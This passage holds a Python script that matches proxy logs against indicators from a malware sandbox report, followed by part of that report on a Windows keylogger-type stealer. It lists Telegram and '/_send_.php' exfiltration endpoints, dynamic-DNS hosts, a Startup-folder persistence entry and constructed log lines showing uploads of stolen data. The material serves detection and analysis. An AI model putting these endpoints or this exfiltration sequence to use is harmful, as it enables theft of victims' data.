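the sample log lines are constructed for the example.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Iterable
from urllib.parse import urlsplit

# Hostnames from the report. The role labels are assigned here, they are not in
# the report: "recon" for the public-IP and geolocation lookups, "exfil" for the
# Telegram API and the _send_.php endpoint, "dyn-dns" for the dynamic-DNS hosts
# on :8081 that were only seen as strings in process memory.
HOST_IOCS: dict[str, str] = {
    "checkip.dyndns.org": "recon",
    "checkip.dyndns.com": "recon",
    "reallyfreegeoip.org": "recon",
    "api.telegram.org": "exfil",
    "varders.kozow.com": "dyn-dns",
    "aborters.duckdns.org": "dyn-dns",
    "anotherarmy.dns.army": "dyn-dns",
}
# IPs from the report's IP table plus the raw-IP POST endpoint.
IP_IOCS: dict[str, str] = {
    "51.38.247.67": "exfil",     # http://51.38.247.67:8081/_send_.php
    "149.154.167.220": "exfil",  # api.telegram.org
    "193.122.6.168": "recon",    # checkip.dyndns.com
    "104.21.80.1": "recon",      # reallyfreegeoip.org
}
EXFIL_PATH = "/_send_.php"
HIGH_RISK_ROLES = {"exfil", "dyn-dns"}

# Constructed log format: "<timestamp> <client-ip> <method> <url> <status>".
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)


@dataclass(frozen=True)
class Hit:
    ts: str
    src: str
    indicator: str
    role: str
    url: str


def classify_url(url: str) -> tuple[str, str] | None:
    """Return (indicator, role) when the URL touches a listed indicator."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host in HOST_IOCS:
        return host, HOST_IOCS[host]
    if host in IP_IOCS:
        return host, IP_IOCS[host]
    # The POST endpoint may sit behind a hostname we have not seen; match the path.
    if parts.path.startswith(EXFIL_PATH):
        return EXFIL_PATH, "exfil"
    return None


def match_line(line: str) -> Hit | None:
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    found = classify_url(m["url"])
    if found is None:
        return None
    indicator, role = found
    return Hit(m["ts"], m["src"], indicator, role, m["url"])


def scan(lines: Iterable[str]) -> list[Hit]:
    return [h for h in map(match_line, lines) if h is not None]


def correlate(hits: Iterable[Hit]) -> dict[str, set[str]]:
    """Clients that did a recon lookup and also reached an exfil or dyn-dns indicator.

    One hit on a legitimate lookup service is a weak signal; the combination is
    the sequence the report describes: country lookup, then upload via Telegram
    or the HTTP form endpoint.
    """
    roles: dict[str, set[str]] = defaultdict(set)
    for h in hits:
        roles[h.src].add(h.role)
    return {src: r for src, r in roles.items() if "recon" in r and r & HIGH_RISK_ROLES}


# Constructed sample lines: 10.0.0.5 mirrors the report's sequence, 10.0.0.9 only
# checks its public IP, which on its own must not alert.
SAMPLE_LOG = """\
2025-01-11T01:27:45 10.0.0.5 GET http://checkip.dyndns.org/ 200
2025-01-11T01:27:46 10.0.0.5 GET https://reallyfreegeoip.org/xml/8.46.123.189 200
2025-01-11T01:27:48 10.0.0.5 POST https://api.telegram.org/botTOKEN/sendDocument 200
2025-01-11T01:27:49 10.0.0.5 POST http://51.38.247.67:8081/_send_.php 200
2025-01-11T01:27:50 10.0.0.9 GET https://www.ecosia.org/newtab/ 200
2025-01-11T01:27:51 10.0.0.9 GET http://checkip.dyndns.org/ 200
""".splitlines()

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f"{h.ts} {h.src} {h.role:<8} {h.indicator}  {h.url}")
    for src, roles in correlate(hits).items():
        print(f"ALERT {src}: {sorted(roles)}")
```

Run as-is to see five indicator hits and one alert for 10.0.0.5; to use it on real data, replace `SAMPLE_LOG` with your proxy export and adjust `LOG_RE` to your log layout. The IPs in `IP_IOCS` are the resolutions observed in this run and will drift (the related-sample tables below show several other Cloudflare and Oracle addresses for the same domains), so hostnames are the more durable indicators.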
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588367
Start date and time: 2025-01-11 01:26:41 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 6BRa130JDj.exe (renamed because the original name is a hash value)
Original Sample Name: e036b840f2d4ce7a8e097d3f8309d2363239f837936161ffb9527cec62987f87.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@10/6@3/3
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 56
• Number of non-executed functions: 277
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target RegSvcs.exe, PID 6148 because it is empty
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: 6BRa130JDj.exe
Time | Type | Description
01:27:42 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs
19:27:42 | API Interceptor | 14188078x Sleep call for process: RegSvcs.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | 4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | JGvCEaqruI.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer |
149.154.167.220 | TjoY7n65om.exe | malicious | Snake Keylogger |
149.154.167.220 | Kb94RzMYNf.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | WGi85dsMNp.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | cOH7jKmo25.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer |
149.154.167.220 | 3i1gMM8K4z.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
149.154.167.220 | 2NJzy3tiny.exe | malicious | MassLogger RAT |
149.154.167.220 | z87sammylastborn.exe | malicious | MassLogger RAT |
149.154.167.220 | vnV17JImCH.exe | malicious | Snake Keylogger, VIP Keylogger |
193.122.6.168 | h1HIe1rt4D.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | 2NJzy3tiny.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | czHx16QwGQ.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | Yef4EqsQha.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | xXUnP7uCBJ.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | ajRZflJ2ch.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | hZbkP3TJBJ.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | 9L83v5j083.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | FILHKLtCw0.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | m0CZ8H4jfl.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
checkip.dyndns.com | 4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 132.226.247.73
checkip.dyndns.com | VCU262Y2QB.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | h1HIe1rt4D.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | yqfze5TKW7.exe | malicious | MassLogger RAT, PureLog Stealer | 158.101.44.242
checkip.dyndns.com | 4AMVusDMPP.exe | malicious | GuLoader | 193.122.130.0
checkip.dyndns.com | VCU262Y2QB.exe | malicious | Snake Keylogger | 158.101.44.242
checkip.dyndns.com | h1HIe1rt4D.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | tVuAoupHhZ.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | TjoY7n65om.exe | malicious | Snake Keylogger | 132.226.247.73
checkip.dyndns.com | Kb94RzMYNf.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
reallyfreegeoip.org | 4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 104.21.32.1
reallyfreegeoip.org | VCU262Y2QB.exe | malicious | Snake Keylogger | 104.21.48.1
reallyfreegeoip.org | h1HIe1rt4D.exe | malicious | Snake Keylogger | 104.21.96.1
reallyfreegeoip.org | yqfze5TKW7.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.112.1
reallyfreegeoip.org | VCU262Y2QB.exe | malicious | Snake Keylogger | 104.21.16.1
reallyfreegeoip.org | h1HIe1rt4D.exe | malicious | Snake Keylogger | 104.21.96.1
reallyfreegeoip.org | tVuAoupHhZ.exe | malicious | Snake Keylogger | 104.21.32.1
reallyfreegeoip.org | TjoY7n65om.exe | malicious | Snake Keylogger | 104.21.80.1
reallyfreegeoip.org | Kb94RzMYNf.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.16.1
reallyfreegeoip.org | WGi85dsMNp.exe | malicious | GuLoader, MassLogger RAT | 104.21.16.1
api.telegram.org | 4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | JGvCEaqruI.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
api.telegram.org | TjoY7n65om.exe | malicious | Snake Keylogger | 149.154.167.220
api.telegram.org | Kb94RzMYNf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | WGi85dsMNp.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | cOH7jKmo25.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
api.telegram.org | 3i1gMM8K4z.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | 2NJzy3tiny.exe | malicious | MassLogger RAT | 149.154.167.220
api.telegram.org | z87sammylastborn.exe | malicious | MassLogger RAT | 149.154.167.220
api.telegram.org | vnV17JImCH.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ORACLE-BMC-31898US | VCU262Y2QB.exe | malicious | Snake Keylogger | 193.122.130.0
ORACLE-BMC-31898US | h1HIe1rt4D.exe | malicious | Snake Keylogger | 193.122.130.0
ORACLE-BMC-31898US | yqfze5TKW7.exe | malicious | MassLogger RAT, PureLog Stealer | 158.101.44.242
ORACLE-BMC-31898US | 4AMVusDMPP.exe | malicious | GuLoader | 193.122.130.0
ORACLE-BMC-31898US | VCU262Y2QB.exe | malicious | Snake Keylogger | 158.101.44.242
ORACLE-BMC-31898US | h1HIe1rt4D.exe | malicious | Snake Keylogger | 193.122.6.168
ORACLE-BMC-31898US | tVuAoupHhZ.exe | malicious | Snake Keylogger | 193.122.130.0
ORACLE-BMC-31898US | phish_alert_sp2_2.0.0.0(4).eml | malicious | Unknown | 192.29.202.93
ORACLE-BMC-31898US | https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351 | malicious | Unknown | 192.29.202.93
ORACLE-BMC-31898US | https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351 | malicious | Unknown | 192.29.202.93
TELEGRAMRU | 4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
TELEGRAMRU | JGvCEaqruI.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
TELEGRAMRU | TjoY7n65om.exe | malicious | Snake Keylogger | 149.154.167.220
TELEGRAMRU | Kb94RzMYNf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | WGi85dsMNp.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
TELEGRAMRU | cOH7jKmo25.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
TELEGRAMRU | 3i1gMM8K4z.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | 2NJzy3tiny.exe | malicious | MassLogger RAT | 149.154.167.220
TELEGRAMRU | z87sammylastborn.exe | malicious | MassLogger RAT | 149.154.167.220
TELEGRAMRU | vnV17JImCH.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
CLOUDFLARENETUS | 4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 104.21.32.1
CLOUDFLARENETUS | BcF3o0Egke.exe | malicious | FormBook | 104.21.15.100
CLOUDFLARENETUS | VCU262Y2QB.exe | malicious | Snake Keylogger | 104.21.48.1
CLOUDFLARENETUS | h1HIe1rt4D.exe | malicious | Snake Keylogger | 104.21.96.1
CLOUDFLARENETUS | ukBQ4ch2nE.exe | malicious | AgentTesla | 104.26.13.205
CLOUDFLARENETUS | yqfze5TKW7.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.112.1
CLOUDFLARENETUS | JGvCEaqruI.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 104.16.185.241
CLOUDFLARENETUS | VCU262Y2QB.exe | malicious | Snake Keylogger | 104.21.16.1
CLOUDFLARENETUS | http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ== | malicious | Unknown | 188.114.97.3
CLOUDFLARENETUS | h1HIe1rt4D.exe | malicious | Snake Keylogger | 104.21.96.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | 4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 104.21.80.1
54328bd36c14bd82ddaa0c04b25ed9ad | VCU262Y2QB.exe | malicious | Snake Keylogger | 104.21.80.1
54328bd36c14bd82ddaa0c04b25ed9ad | h1HIe1rt4D.exe | malicious | Snake Keylogger | 104.21.80.1
54328bd36c14bd82ddaa0c04b25ed9ad | yqfze5TKW7.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.80.1
54328bd36c14bd82ddaa0c04b25ed9ad | VCU262Y2QB.exe | malicious | Snake Keylogger | 104.21.80.1
54328bd36c14bd82ddaa0c04b25ed9ad | h1HIe1rt4D.exe | malicious | Snake Keylogger | 104.21.80.1
54328bd36c14bd82ddaa0c04b25ed9ad | tVuAoupHhZ.exe | malicious | Snake Keylogger | 104.21.80.1
54328bd36c14bd82ddaa0c04b25ed9ad | TjoY7n65om.exe | malicious | Snake Keylogger | 104.21.80.1
54328bd36c14bd82ddaa0c04b25ed9ad | Kb94RzMYNf.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
54328bd36c14bd82ddaa0c04b25ed9ad | WGi85dsMNp.exe | malicious | GuLoader, MassLogger RAT | 104.21.80.1
3b5074b1b5d032e5620f69f9f700ff0e | 4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | ukBQ4ch2nE.exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | JGvCEaqruI.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | J4CcLMNm55.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | J4CcLMNm55.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | ru52XOQ1p7.exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | TjoY7n65om.exe | malicious | Snake Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Kb94RzMYNf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | WGi85dsMNp.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 4z8Td6Kv8R.exe | malicious | Unknown | 149.154.167.220
                                                                                                                  No context
                                                                                                                  Process:C:\Users\user\Desktop\6BRa130JDj.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1055744
                                                                                                                  Entropy (8bit):7.051987070428753
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:Du6J33O0c+JY5UZ+XC0kGso6FaPAlbrjFTSd7DqBWY:Nu0c++OCvkGs9FaP6FTy7D/Y
                                                                                                                  MD5:CB47B81059D6E0B15AD2AB00C3491C48
                                                                                                                  SHA1:4CF91A5E49A4D17F2C0D35BC52DEE15ECDF155DC
                                                                                                                  SHA-256:E036B840F2D4CE7A8E097D3F8309D2363239F837936161FFB9527CEC62987F87
                                                                                                                  SHA-512:ECCE445BBE23F600D09357DF1CD4488F958BE9E2981B68A2DCBA82DC41507F2B5F391AB97C7F13418B638B41F7DBB5E8D8D8946F317090D72B715EB23067D6AD
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                  Reputation:low
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...xcRg.........."..........:.......}............@.................................RE....@...@.......@.....................L...|....p...........................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc........p......................@..@.reloc...q.......r..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\Desktop\6BRa130JDj.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):138314
                                                                                                                  Entropy (8bit):7.943258750504413
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:WvKmeUg+FFcFTTbBQ7Kvt927RByWQpRPxHkLToTiDkbNL5La3lhLYO:WvKmebfFTZQ7+927DQRtTisNL5cLYO
                                                                                                                  MD5:B5931AEAE1266F6FEC913F47AF16824A
                                                                                                                  SHA1:B7E0E29BE9E89492A98272EADEFA61F0E2CB1CC2
                                                                                                                  SHA-256:31F3F7D5A6B7406750DC83BCCD0CC0233BC9BDF6B43EE0E0DE1FC8E6516F7AA1
                                                                                                                  SHA-512:37023245E52390C233DD763316A79D15A0A399D24771A49D630A09A82C71DD1AB6B44979C613BD23DA888A86D4C5BF1EE0E16B86081B04A0C34A6E5B8AD846E4
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:EA06..<..B8.*..sC.Q.~.mC.T.Uj..5.L)u*...4N.....mC...fd.5....>.c)..<.7y..o?..~u?..&.e~k$..%.ymZyF.N.V.=..k.."QHM..U.He..4...N..K.F.u:7.....4k.V.M..K..t.L.. .,G..*....hU...D..V..A......i....@......*].8...8..[.U.@....hw!v.L ....{C...:.m.R.5.........M....+2.@..;....t......."...R....'z.5.T,..-.f.h.NR..B..4G..._...0..&5..vkX.......&o.....P..[|r(.p....jTi.....7.Y..v.h|....)I.{..? ..v.[.......s....RfT...a[.4.........B..hG@.......N%.......'.@...hB... ..>.4(........*s...oN......Z1....s.o..0........&.j...V.t(.[...H.Pv.p""K~..'.)...R.B...E.J....2..T...Wa.U.....2.....G".>...(.2o....0i...........cS.U;....5U._...4.......|v....+U.."=2.Ze...B....4~D..6.......V@..?.....kTp..Ygu....8..%...2c..Xn..5B.=.N-.y.......I4.......Je..9.....U:.6../.+..k.....B12.R.R.<._.M.s..F.X..+.).6.|.T'.Z..G..)sjLz.I....8. .K..'..V.N....I..(..-..\.w..,....L.|....[.Ef.).&.+..N..u..3..N..<.^...I...N.Do3.=>...|.s...n..G..N.. .Q.t...h.pM(.Y..\...uz...Q'S....L.My...?..hM..p..z.N@..P.
                                                                                                                  Process:C:\Users\user\AppData\Local\Allene\ectosphere.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):138314
                                                                                                                  Entropy (8bit):7.943258750504413
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:WvKmeUg+FFcFTTbBQ7Kvt927RByWQpRPxHkLToTiDkbNL5La3lhLYO:WvKmebfFTZQ7+927DQRtTisNL5cLYO
                                                                                                                  MD5:B5931AEAE1266F6FEC913F47AF16824A
                                                                                                                  SHA1:B7E0E29BE9E89492A98272EADEFA61F0E2CB1CC2
                                                                                                                  SHA-256:31F3F7D5A6B7406750DC83BCCD0CC0233BC9BDF6B43EE0E0DE1FC8E6516F7AA1
                                                                                                                  SHA-512:37023245E52390C233DD763316A79D15A0A399D24771A49D630A09A82C71DD1AB6B44979C613BD23DA888A86D4C5BF1EE0E16B86081B04A0C34A6E5B8AD846E4
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:EA06..<..B8.*..sC.Q.~.mC.T.Uj..5.L)u*...4N.....mC...fd.5....>.c)..<.7y..o?..~u?..&.e~k$..%.ymZyF.N.V.=..k.."QHM..U.He..4...N..K.F.u:7.....4k.V.M..K..t.L.. .,G..*....hU...D..V..A......i....@......*].8...8..[.U.@....hw!v.L ....{C...:.m.R.5.........M....+2.@..;....t......."...R....'z.5.T,..-.f.h.NR..B..4G..._...0..&5..vkX.......&o.....P..[|r(.p....jTi.....7.Y..v.h|....)I.{..? ..v.[.......s....RfT...a[.4.........B..hG@.......N%.......'.@...hB... ..>.4(........*s...oN......Z1....s.o..0........&.j...V.t(.[...H.Pv.p""K~..'.)...R.B...E.J....2..T...Wa.U.....2.....G".>...(.2o....0i...........cS.U;....5U._...4.......|v....+U.."=2.Ze...B....4~D..6.......V@..?.....kTp..Ygu....8..%...2c..Xn..5B.=.N-.y.......I4.......Je..9.....U:.6../.+..k.....B12.R.R.<._.M.s..F.X..+.).6.|.T'.Z..G..)sjLz.I....8. .K..'..V.N....I..(..-..\.w..,....L.|....[.Ef.).&.+..N..u..3..N..<.^...I...N.Do3.=>...|.s...n..G..N.. .Q.t...h.pM(.Y..\...uz...Q'S....L.My...?..hM..p..z.N@..P.
                                                                                                                  Process:C:\Users\user\AppData\Local\Allene\ectosphere.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):138314
                                                                                                                  Entropy (8bit):7.943258750504413
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:WvKmeUg+FFcFTTbBQ7Kvt927RByWQpRPxHkLToTiDkbNL5La3lhLYO:WvKmebfFTZQ7+927DQRtTisNL5cLYO
                                                                                                                  MD5:B5931AEAE1266F6FEC913F47AF16824A
                                                                                                                  SHA1:B7E0E29BE9E89492A98272EADEFA61F0E2CB1CC2
                                                                                                                  SHA-256:31F3F7D5A6B7406750DC83BCCD0CC0233BC9BDF6B43EE0E0DE1FC8E6516F7AA1
                                                                                                                  SHA-512:37023245E52390C233DD763316A79D15A0A399D24771A49D630A09A82C71DD1AB6B44979C613BD23DA888A86D4C5BF1EE0E16B86081B04A0C34A6E5B8AD846E4
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:EA06..<..B8.*..sC.Q.~.mC.T.Uj..5.L)u*...4N.....mC...fd.5....>.c)..<.7y..o?..~u?..&.e~k$..%.ymZyF.N.V.=..k.."QHM..U.He..4...N..K.F.u:7.....4k.V.M..K..t.L.. .,G..*....hU...D..V..A......i....@......*].8...8..[.U.@....hw!v.L ....{C...:.m.R.5.........M....+2.@..;....t......."...R....'z.5.T,..-.f.h.NR..B..4G..._...0..&5..vkX.......&o.....P..[|r(.p....jTi.....7.Y..v.h|....)I.{..? ..v.[.......s....RfT...a[.4.........B..hG@.......N%.......'.@...hB... ..>.4(........*s...oN......Z1....s.o..0........&.j...V.t(.[...H.Pv.p""K~..'.)...R.B...E.J....2..T...Wa.U.....2.....G".>...(.2o....0i...........cS.U;....5U._...4.......|v....+U.."=2.Ze...B....4~D..6.......V@..?.....kTp..Ygu....8..%...2c..Xn..5B.=.N-.y.......I4.......Je..9.....U:.6../.+..k.....B12.R.R.<._.M.s..F.X..+.).6.|.T'.Z..G..)sjLz.I....8. .K..'..V.N....I..(..-..\.w..,....L.|....[.Ef.).&.+..N..u..3..N..<.^...I...N.Do3.=>...|.s...n..G..N.. .Q.t...h.pM(.Y..\...uz...Q'S....L.My...?..hM..p..z.N@..P.
                                                                                                                  Process:C:\Users\user\Desktop\6BRa130JDj.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):277504
                                                                                                                  Entropy (8bit):6.9765305980486465
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:nhlhTcDmgzaN8ykgkddaVurF8tAZP7tLeJvDdAwH0n6JTMyY6ivWqQNZQVaQQ:nHhTcDmBNKJddvrF7ZP7tLeJvWwH0n6B
                                                                                                                  MD5:5FBD6058183AAFEED251AEBEF4E95C86
                                                                                                                  SHA1:5BB675DD54499A4871B59A591FB93A18C2B16CAE
                                                                                                                  SHA-256:3D400363AA132D92879C2454A0F0F49CD34D8CF697758FA6D9E8E43070525E9C
                                                                                                                  SHA-512:1FB7DE85E641EED5BF2BD95132ABC21630F4D6F054C7FDBA0029D4674142F53D47DCC3037638D16BCE2C641A0235AA23726B50704CBB223ADC80EB8CB51616D6
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:...2SF9C<GEH.6C.S2VX7L5r0KRV2PF9C8GEH0K6C8S2VX7L520KRV2PF9C.GEH>T.M8.;.y.My...:?Ap6K,_5$%.(W-V<Fv:RlGG^k;8...jcU(!-.F;I.S2VX7L5buKR.3SF..!EH0K6C8S.VZ6G4b0KtR2PR9C8GEH..2C8s2VXWH520.RV.PF9A8GAH0K6C8S6VX7L520K.R2PD9C8GEH2Kv.8S"VX'L520[RV"PF9C8GUH0K6C8S2VX7.v60.RV2P&=C/WEH0K6C8S2VX7L520KRV.TF5C8GEH0K6C8S2VX7L520KRV2PF9C8GEH0K6C8S2VX7L520KRV2PF9c8GMH0K6C8S2VX7D.20.RV2PF9C8GEH.?S;LS2Vl.H52.KRV.TF9A8GEH0K6C8S2VX7l52Pe %@3F9C/WEH0+2C8A2VX.H520KRV2PF9C8G.H0..1]?]5X7@520K.R2PD9C8}AH0K6C8S2VX7L5r0K.V2PF9C8GEH0K6C8S".\7L520.RV2RF<Cl.GH..7C;S2V.7L3..IR.2PF9C8GEH0K6C8S2VX7L520KRV2PF9C8GEH0K6C8S2V.J.:...;%..F9C8GEI2H2E0[2VX7L5205RV2.F9CxGEH.K6C.S2V57L5.0KR(2PFGC8G!H0KDC8SSVX7.520$RV2>F9CFGEH.I.c8S8|~7N..0KXV..5.C8M.I0K20.S2\.5L56CoRV8.E9C<4`H0A.G8S6%~7L?.5KRR..F:..AEH+$.C8Y2U."J52+atV0x|9C2Gon0H.V>S2Mr.L7.9KRR..5$C8Am.0K<71S2T.=L56.UP~vPF3i.9NH0O.C.qLZX7H.2.i,[2PB.C.YG.=K6G.qLXX7H.2.i,Y2PB.C.YG.?K6G.qLFX7H.2.i,G2PB.C.e;Z0K2h8y.(K7L1.0ap(&PF=h8mg6%K6G.S.t&!L56.KxtLGF9G.GojNS6C<x2|F5.-20OxP.2FKb.G5K
Process:C:\Users\user\AppData\Local\Allene\ectosphere.exe
File Type:data
Category:dropped
Size (bytes):276
Entropy (8bit):3.3623495373934764
Encrypted:false
SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1klADiNDdnriIM8lfQVn:DsO+vNlzQ1klADizmA2n
MD5:5CA8B698A3F50D005575AE4E6C5FD4BC
SHA1:BABD579418B3C5CA6C5538045DE33383A5EA1524
SHA-256:659542ED2B6392DC0C0679A23E47A07D1C02CCC50C86FAC9B48901209A331D44
SHA-512:6D16D135A72E8E2D09921B9DA58D36791671AD5A762B5A1A837BEAA7CA293F5A15040E0FA552AA83BA9BDBF4872BCB43524A791891AEC223B4F117E6B06CFAAB
Malicious:true
Reputation:low
